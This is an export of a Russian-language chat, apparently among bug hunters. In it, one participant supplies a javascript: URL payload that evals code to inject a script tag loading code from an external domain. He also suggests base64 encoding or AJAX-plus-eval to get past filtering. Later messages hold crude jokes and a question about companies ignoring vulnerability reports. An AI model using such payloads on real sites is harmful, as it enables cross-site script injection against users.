JG
javascript:alert(1) из урла. Можно ли в таком случае исполнить скрипт через src с внешнего доменаSize: a a a
2020 September 02
ЕШ
Есть вопрос. Я могу исполнить
ЕШ
Разный синтаксис пробовал - не получается
I
как насчет такого
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://domain.com/1.js\';document.body.appendChild(a)')I
или аяксом выкачать скрипт и эвальнуть
ЕШ
как насчет такого
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://domain.com/1.js\';document.body.appendChild(a)')Кавычка не проходит (
I
а если в base64 спрятать
ЕШ
буду пробовать
2020 September 04
a
Выше — боты. Они тоже вступили в мой английский чат.
AB
Я не робот *
AB
*)
AW
Agnia Baar
Я не робот *
Чем докажете?
a
Чем докажете?
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
AB
AW
a user
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
Тогда я - участник
AB
a user
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
Да вы правы)
2020 September 05
RT
Ребята, что делаете если находите уязвимости в сайтах/продуктах и на вежливые письма с вопросами по поводу кооперации вас игнорят? П.с. компании в последнее время случайно попадались Российские
AS
Ребята, что делаете если находите уязвимости в сайтах/продуктах и на вежливые письма с вопросами по поводу кооперации вас игнорят? П.с. компании в последнее время случайно попадались Российские
Я забивал болт
RT
Что если деликатно подкатывать к компаниям которые зависят от этого продукта и уязвимы из-за дыры их партнёра ?